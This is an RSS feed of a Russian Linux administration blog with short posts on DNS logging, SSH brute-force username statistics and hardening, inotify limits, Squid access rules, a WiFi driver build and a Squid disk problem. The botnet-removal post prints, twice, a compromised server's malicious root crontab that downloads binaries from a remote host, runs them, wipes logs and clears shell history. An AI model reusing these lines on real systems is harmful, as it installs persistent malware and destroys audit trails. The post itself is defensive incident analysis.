<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
  <channel>
    <atom:link rel="self" type="application/rss+xml" href="http://breys.ru/rss"/>
    <language>ru</language>
    <copyright>Copyright 2008,2009 breys.ru</copyright>
    <title>Заметки на breys.ru</title>
    <link>http://breys.ru/blog/</link>
    <description>Заметки по теме: Linux, Брейс - дизайн студия</description>
    <item>
      <link>http://breys.ru/blog/1610.html</link>
      <guid>http://breys.ru/blog/1610.html</guid>
      <title>отключение журналов bind9</title>
      <pubDate>Tue, 12 Aug 2014 18:40:59 +0400</pubDate>
      <description>&lt;p&gt;Нет ничего удивительного в использовании на домашнем компьютере собственного DNS сервера, так это экономит траффик, ускоряет запросы к сайтам,&amp;nbsp; позволяет организовывать удобную домашную сеть с вайфаем и шарами, но весьма удивительно позволять&amp;nbsp; настроенному &lt;strong&gt;DNS&lt;/strong&gt; серверу писать свои сообщения в общесистемные журналы, потому что этот сервер весьма болтливый. Вот например анализ моего syslog, накопленный за 6 дней:&lt;/p&gt;
&lt;pre&gt;cat /var/log/syslog|sed &amp;#039s/\[/ /g&amp;#039|awk &amp;#039{print $5}&amp;#039|sort| uniq -c|sort -n&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1 avahi-daemon&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4 dbus&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7 rsyslogd:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 14 acpid:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 14 NetworkManager&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 15 anacron&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 15 pppd&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 31 CRON&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 48 dhcpd:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 679 kernel:&lt;br /&gt;&amp;nbsp;&amp;nbsp; 1982 named&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;тут сразу видно, что каждые два из трёх сообщения произносится &lt;strong&gt;DNS сервером&lt;/strong&gt;. Думаю на домашнем сервере можно просто напросто отключить логирование &lt;strong&gt;DNS&lt;/strong&gt;, ну или перенаправить в отдельные файлы&lt;/p&gt;
&lt;p&gt;Для отключения журналирования события &lt;strong&gt;BIND9&lt;/strong&gt; достаточно добавит опцию&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;querylog false;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;в раздел &lt;strong&gt;options&lt;/strong&gt; файла &lt;strong&gt;/etc/bind/named.conf.options&lt;/strong&gt;&lt;/p&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1606.html</link>
      <guid>http://breys.ru/blog/1606.html</guid>
      <title>Двадцатка самых популярных имён пользователей при взломе серверов</title>
      <pubDate>Fri, 18 Jul 2014 10:02:29 +0400</pubDate>
      <description>&lt;p&gt;Наблюдая за серверами и учитывая, что практически ежеминутно на каждый сервер, доступный в инетернете, происходит атака подобора пароля, очень интересно наблюдать за этими злодействиями в системных журналах. Достаточно применить вот такой простой фильтр чтобы отобрать из журнала авторизации все неудачные попыки подключения к серверу&lt;/p&gt;
&lt;pre&gt;sudo grep ssh /var/log/auth.log |grep &amp;#039Invalid user&amp;#039|awk &amp;#039{print $8}&amp;#039|sort|uniq -c|sort -rn|head -20&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 418 admin&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 160 oracle&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 71 postgres&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 64 test&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 62 nagios&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 31 support&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 31 git&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 29 user&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 27 teamspeak&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 25 minecraft&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 24 sandeep&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 23 jenkins&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 19 ftpuser&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 17 web&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 17 mythtv&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 17 hadoop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 16 webmaster&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 16 sanjay&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 16 guest&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 15 vnc&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Тут видно, что при всём богатстве выбора имён для OS пользователей сервера, злочинцы довольно часто используют имена созвучные с названием служб котоые могут быть запущены на сервере, например при создании git репозитария кажется логичным создать и пользователя git, так же с vnc, postgres и тд., но не имея возможность знать имена пользователей ОС сервера, расчитывауют использовать эту беспечность и подобрать пароль. По сути они напоминают взломщиков, которые перебирая свои отмычки вынуждены их постоянно подпиливать и пробовать снова.&lt;/p&gt;
&lt;p&gt;Для того чтобы обезопасить себя от этих злочинцев необходимо как минимум сделать две вещи:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Запретить логин root пользователя на сервер, добавив такую опцию в /etc/ssh/sshd_config&lt;br /&gt;
&lt;blockquote&gt;PermitRootLogin without-password&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;Установить и настроить службу слежения за подключениями и блокировкой неудачников в фаерволе
&lt;blockquote&gt;aptitude search deny&lt;br /&gt;i&amp;nbsp;&amp;nbsp; denyhosts&lt;/blockquote&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Rcnfnb&lt;/p&gt;
&lt;p&gt;Кстати, на серверах которые дольше всех использует denyhosts, постоянно подключены к сети и имеют статический адрес количество подобных атак в разы меньше&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;sudo grep ssh /var/log/auth.log* |grep &amp;#039Invalid user&amp;#039|awk &amp;#039{print $8}&amp;#039|sort|uniq -c|sort -rn| head &lt;/pre&gt;
&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 25 admin&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 8 test&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6 support&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4 ghost&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3 ubnt&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3 pi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3 ashish&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3 arun&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3 aman&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3 ajay&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Видимо злочинцы осознанно сканируют сети динамических адрес в поисках серверов админов в махеровых халатах&lt;/p&gt;
&lt;ol&gt; &lt;/ol&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1605.html</link>
      <guid>http://breys.ru/blog/1605.html</guid>
      <title>Настройка inotify для работы с большими файловыми системами</title>
      <pubDate>Tue, 08 Jul 2014 16:23:33 +0400</pubDate>
      <description>&lt;p&gt;Бибилиотека pyinotify очень полезна и удобна создания различных обработчиков событий происходящих в файловой системе.&lt;/p&gt;
&lt;p&gt;Но если вам захочется отслеживать постоянно растущую домашнюю директорию, то вы получите следующие ошибки при запуске монитора:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/savegames/skirmish WD=-1, Errno=No space left on device (ENOSPC)&lt;br /&gt;[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/maps WD=-1, Errno=No space left on device (ENOSPC)&lt;br /&gt;[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/music WD=-1, Errno=No space left on device (ENOSPC)&lt;br /&gt;[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/logs WD=-1, Errno=No space left on device (ENOSPC)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Такое необъяснимое поведение библиотеки объясняется дефолтными настройками ядра, которое по умолчанию позволяет простому пользователю создавать всего 629145 наблюдателей(watches)&lt;/p&gt;
&lt;pre&gt;sysctl | grep max_user_watches&lt;/pre&gt;
&lt;p&gt;Доведите это число до нужного вам и всё будет работать&lt;/p&gt;
&lt;pre&gt;sysctl fs.epoll.max_user_watches=1658859&lt;/pre&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1604.html</link>
      <guid>http://breys.ru/blog/1604.html</guid>
      <title>Squid ограничение доступа по времени</title>
      <pubDate>Fri, 04 Jul 2014 11:17:02 +0400</pubDate>
      <description>&lt;p&gt;Когда надо ограничить доступ по времени, например к социальным сетям, необходимо добавить в настройки прокси сервера следующие опции:&lt;/p&gt;
&lt;p&gt;создать файл /etc/squid/block_soc_net.txt&amp;nbsp; со списком ограничиваемых ресурсов&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;facebook.com&lt;br /&gt;liveinternet.ru&lt;br /&gt;livejournal.com&lt;br /&gt;mamba.ru&lt;br /&gt;my.mail.ru&lt;br /&gt;odnoklassniki.ru&lt;br /&gt;twitter.com&lt;br /&gt;vk.com&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Добавить новые ACL:&lt;/p&gt;
&lt;pre&gt;acl bad_soc_net url_regex -i "/etc/squid/block_soc_net.txt"&lt;br /&gt;acl OBED time 12:00-13:00&lt;/pre&gt;
&lt;p&gt;Добавить новое правило запрещающее ВСЕМ обращаться к адресам из составленного списка в любое время кроме ОБЕДА:&lt;/p&gt;
&lt;pre&gt;http_access deny !OBED bad_soc_net all&lt;/pre&gt;
&lt;p&gt;А следом, для информативности, добавить правило направляющее на внутренную страницу с поясняющим сообщением&lt;/p&gt;
&lt;pre&gt;deny_info http://work.a/page958.html all&lt;/pre&gt;
&lt;p&gt;После перезапуска squid&amp;nbsp; всё будет работать&lt;/p&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1603.html</link>
      <guid>http://breys.ru/blog/1603.html</guid>
      <title>Удаление ботнета sfewfesfs </title>
      <pubDate>Wed, 02 Jul 2014 13:17:53 +0400</pubDate>
      <description>&lt;p&gt;Недавно достался на обслуживание старенький сервер, в ходе работы которого регулярно возникали проблемы с раздачей интернета через прокси. В ходе разбирательств выяснилось, что сервер учавствует в ботнете, проявлялось это в следующем:&lt;/p&gt;
&lt;p&gt;в списке процессов висел процесс /etc/sfewfesfs и /etc/.SSH&lt;/p&gt;
&lt;p&gt;крайне большой для этого сервера исходящий траффик&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;eth1: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Jun ཊ &amp;nbsp; &amp;nbsp; 18.97 GiB &amp;nbsp;/ &amp;nbsp;145.58 GiB &amp;nbsp;/ &amp;nbsp;164.55 GiB&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img src="/upload/1404365088.86.png" alt="статистика использовать внешнего интерфейса при участии компьютера в ботнете" /&gt;&lt;br /&gt;статистика использовать внешнего интерфейса при участии компьютера в ботнете&lt;/p&gt;
&lt;p&gt;постоянное &amp;nbsp;ssh соединие с китайским адресом &amp;nbsp;из 116.10.191.0/24&lt;/p&gt;
&lt;p&gt;Зараза скорее всего попала следующим образом:&lt;/p&gt;
&lt;p&gt;раньше сервер находился за натом своего ADSL модема, имел крепкие пароли на модеме, но слабые пароли на самом сервере. Через несколько лет, после перезаключение ADSL договора им заменили модем, на которым до недавнего времени были настройки по умолчанию, то-есть всем известный логин/пароль админ/админ. При этом кто-то из предыдущих админов пробрасывал 22 порт на сервер и биндил модем на dyndns.org. Таким образом достаточно было в ходе сканирования зайти на ssh сервер с простым паролем root и установить всё что нужно.&lt;/p&gt;
&lt;p&gt;Работает бакдор следующим образом:&lt;/p&gt;
&lt;p&gt;в cron пользователя root (/var/spool/cron/crontabs/root) записывается много правил, которые регулярно обновляют вирус&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;*/100 * * * * nohup /etc/sdmfdsfhjfe &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;&lt;br /&gt;*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr&lt;br /&gt;*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf&lt;br /&gt;*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs&lt;br /&gt;*/120 * * * * cd /root;rm -rf dir nohup.out&lt;br /&gt;*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew&lt;br /&gt;*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe&lt;br /&gt;*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre&lt;br /&gt;*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir dsfrefr.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir ferwfrre.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*&lt;br /&gt;*/1 * * * * cd /root &amp;gt; .bash_history&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; access-log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; aculog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; anaconda.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; cups&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; daemon.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; dpkg.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; faillog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; kern.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; lastlog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; maillog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; messages&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; secure&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; spooler&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; sudolog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; user.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; utmp&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; wtmp&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; Xorg.x.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; yum.log&lt;br /&gt;*/1 * * * * chmod 7777 /etc/dsfrefr&lt;br /&gt;*/1 * * * * chmod 7777 /etc/ferwfrre&lt;br /&gt;*/1 * * * * chmod 7777 /etc/gfhddsfew&lt;br /&gt;*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf&lt;br /&gt;*/1 * * * * chmod 7777 /etc/rewgtf3er4t&lt;br /&gt;*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe&lt;br /&gt;*/1 * * * * chmod 7777 /etc/sfewfesfs&lt;br /&gt;*/1 * * * * history -c&lt;br /&gt;*/1 * * * * killall -9 32&lt;br /&gt;*/1 * * * * killall -9 64&lt;br /&gt;*/1 * * * * killall -9 b26&lt;br /&gt;*/1 * * * * killall -9 codelove&lt;br /&gt;*/1 * * * * killall -9 DDosl&lt;br /&gt;*/1 * * * * killall -9 freeBSD&lt;br /&gt;*/1 * * * * killall -9 .IptabLes&lt;br /&gt;*/1 * * * * killall -9 lengchao32&lt;br /&gt;*/1 * * * * killall -9 new4&lt;br /&gt;*/1 * * * * killall -9 new6&lt;br /&gt;*/1 * * * * killall -9 nfsd&lt;br /&gt;*/1 * * * * killall -9 nfsd4&lt;br /&gt;*/1 * * * * killall -9 node24&lt;br /&gt;*/1 * * * * killall -9 profild.key&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir dsfrefr&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir ferwfrre&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir gfhddsfew&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe&lt;br /&gt;*/94 * * * * killall -9 dsfrefr&lt;br /&gt;*/95 * * * * killall -9 ferwfrre&lt;br /&gt;*/96 * * * * killall -9 rewgtf3er4t&lt;br /&gt;*/97 * * * * killall -9 sdmfdsfhjfe&lt;br /&gt;*/98 * * * * killall -9 gfhjrtfyhuf&lt;br /&gt;*/99 * * * * killall -9 sdmfdsfhjfe&lt;br /&gt;*/99 * * * * nohup /etc/gfhjrtfyhuf &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;&lt;br /&gt;*/99 * * * * nohup /etc/sfewfesfs &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;&lt;br /&gt;*/100 * * * * nohup /etc/sdmfdsfhjfe &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;&lt;br /&gt;*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr&lt;br /&gt;*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf&lt;br /&gt;*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs&lt;br /&gt;*/120 * * * * cd /root;rm -rf dir nohup.out&lt;br /&gt;*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew&lt;br /&gt;*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe&lt;br /&gt;*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre&lt;br /&gt;*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir dsfrefr.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir ferwfrre.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*&lt;br /&gt;*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*&lt;br /&gt;*/1 * * * * cd /root &amp;gt; .bash_history&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; access-log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; aculog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; anaconda.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; cups&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; daemon.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; dpkg.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; faillog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; kern.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; lastlog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; maillog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; messages&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; secure&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; spooler&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; sudolog&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; user.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; utmp&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; wtmp&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; Xorg.x.log&lt;br /&gt;*/1 * * * * cd /var/log &amp;gt; yum.log&lt;br /&gt;*/1 * * * * chmod 7777 /etc/dsfrefr&lt;br /&gt;*/1 * * * * chmod 7777 /etc/ferwfrre&lt;br /&gt;*/1 * * * * chmod 7777 /etc/gfhddsfew&lt;br /&gt;*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf&lt;br /&gt;*/1 * * * * chmod 7777 /etc/rewgtf3er4t&lt;br /&gt;*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe&lt;br /&gt;*/1 * * * * chmod 7777 /etc/sfewfesfs&lt;br /&gt;*/1 * * * * history -c&lt;br /&gt;*/1 * * * * killall -9 32&lt;br /&gt;*/1 * * * * killall -9 64&lt;br /&gt;*/1 * * * * killall -9 b26&lt;br /&gt;*/1 * * * * killall -9 codelove&lt;br /&gt;*/1 * * * * killall -9 DDosl&lt;br /&gt;*/1 * * * * killall -9 freeBSD&lt;br /&gt;*/1 * * * * killall -9 .IptabLes&lt;br /&gt;*/1 * * * * killall -9 lengchao32&lt;br /&gt;*/1 * * * * killall -9 new4&lt;br /&gt;*/1 * * * * killall -9 new6&lt;br /&gt;*/1 * * * * killall -9 nfsd&lt;br /&gt;*/1 * * * * killall -9 nfsd4&lt;br /&gt;*/1 * * * * killall -9 node24&lt;br /&gt;*/1 * * * * killall -9 profild.key&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir dsfrefr&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir ferwfrre&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir gfhddsfew&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t&lt;br /&gt;*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe&lt;br /&gt;*/94 * * * * killall -9 dsfrefr&lt;br /&gt;*/95 * * * * killall -9 ferwfrre&lt;br /&gt;*/96 * * * * killall -9 rewgtf3er4t&lt;br /&gt;*/97 * * * * killall -9 sdmfdsfhjfe&lt;br /&gt;*/98 * * * * killall -9 gfhjrtfyhuf&lt;br /&gt;*/99 * * * * killall -9 sdmfdsfhjfe&lt;br /&gt;*/99 * * * * nohup /etc/gfhjrtfyhuf &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;*/99 * * * * nohup /etc/sfewfesfs &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div&gt;Таким образом первым делом необходимо удалить правила кронтаба, затем прибить все указанные процессы и удалить используемые им файлы.&lt;/div&gt;
&lt;div&gt;Ну а на последок, мне кажется, что надёжнее всего переустановить дистрибутив&lt;/div&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1597.html</link>
      <guid>http://breys.ru/blog/1597.html</guid>
      <title>Установка WiFi карты D-Link DWA-525 в Ubuntu 10.04</title>
      <pubDate>Mon, 13 Jan 2014 18:44:53 +0400</pubDate>
      <description>&lt;p&gt;Намаявшись с&amp;nbsp;&lt;span style="color: #565051; font-size: medium; margin: 0px;"&gt;&lt;span style="font-size: 16px;"&gt;Marvel 8335 (геморой с win драйверам и ndiswrapped, а так же нестабильность работы в целом, вплоть до зависаний ядра),&amp;nbsp;&lt;/span&gt;&lt;/span&gt;а так же с TP-Link TL-WN751ND (вроде ядро 3.3.1 на ходу определяет, но регулярно разрывается связь)&lt;/p&gt;
&lt;p&gt;Приобрёл&amp;nbsp;D-Link DWA-525, ядро сам не определило устройство, пришлось ставить руками&lt;/p&gt;
&lt;pre&gt;sudo -i&lt;br /&gt;

# нужно запретить загрузку почти одноимённого и не подходящего драйвера&lt;br /&gt;

echo blacklist rt2800pci &amp;gt;&amp;gt; /etc/modprobe.d/blacklist.conf&lt;br /&gt;
# на случай, если он всё таки загрузился, нужно выгрузить драйвер и для этого не обязательно перезагружаться&lt;br /&gt;

modprode -r rt2800pci&lt;br /&gt;

mkdir DWA-525&lt;br /&gt;

cd DWA-525&lt;br /&gt;

# скачиваем исходники дайвера с сайта D-Link &lt;br /&gt;

mkdir ~/DWA-525 &lt;br /&gt;

cd ~/DWA-525/ &lt;br /&gt;

wget -c http://ftp.dlink.ru/pub/Wireless/DWA-525/Drivers/Linux/rev.A2/LinuxSTA_v2.6.1.0_1.7z&lt;br /&gt;

# распечатываем 7z архив &lt;br /&gt;
7z x LinuxSTA_v2.6.1.0_1.7z&amp;nbsp;&lt;br /&gt;
# собираем и устанавливаем драйвер из исходников, должен быть установлен пакет с заголовками ядра и&amp;nbsp;build-essential &lt;br /&gt;
cd LinuxSTA_v2.6.1.0_1/DWA-525_A2_LinuxSTA_V2.6.1.0_1/ &lt;br /&gt;

make &amp;amp;&amp;amp; make install&lt;br /&gt;

# теперь можно загрузить драйвер и проверить&lt;br /&gt;

modprode rt5592sta &lt;br /&gt;
dmesg |tail -20 &lt;br /&gt;
ifconfig -a&amp;nbsp;&lt;br /&gt;

файл драйвера находится в&lt;br /&gt;
ls /lib/modules/`uname -r`/kernel/drivers/net/wireless/rt5592sta.ko
&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;после этого вроде бы всё работает так и должно работать в линуксе, разве что выхлоп dmesg теперь будет содержать отладочную информацию от драйвера, очевидно до тех пока его не включат в общее ядро&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1595.html</link>
      <guid>http://breys.ru/blog/1595.html</guid>
      <title>Если утром не запустился squid</title>
      <pubDate>Fri, 20 Dec 2013 09:38:16 +0400</pubDate>
      <description>&lt;p&gt;Заглянув в кальмарий живой журнал я обнаружил удивительную заметку&lt;/p&gt;
&lt;pre&gt;tail -f /var/log/squid/cache.log&lt;br /&gt;logfileOpen: opening log /var/log/squid/access.log&lt;br /&gt;logfileOpen (stdio): /var/log/squid/access.log: (28) No space left on device&lt;br /&gt;FATAL: logfileOpen: path /var/log/squid/access.log: couldn&amp;#039t open!&lt;br /&gt;&lt;/pre&gt;
&lt;p&gt;кальмар сообщал, что не способен создать новый файл журнала потому что на смонтированном разделе закончилось место, вот только верный df сообщал, что места хватает&lt;/p&gt;
&lt;pre&gt;df -h&lt;br /&gt;/dev/sda2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 28G&amp;nbsp;&amp;nbsp; 19G&amp;nbsp; 7,7G&amp;nbsp; 71% /var&lt;/pre&gt;
&lt;p&gt;не веря свои глазам я проверил лимит файлов на смонтированном разделе и о радость -- оказалось, что за два года наш кальмар наполнил свою ночную вазу до края&lt;/p&gt;
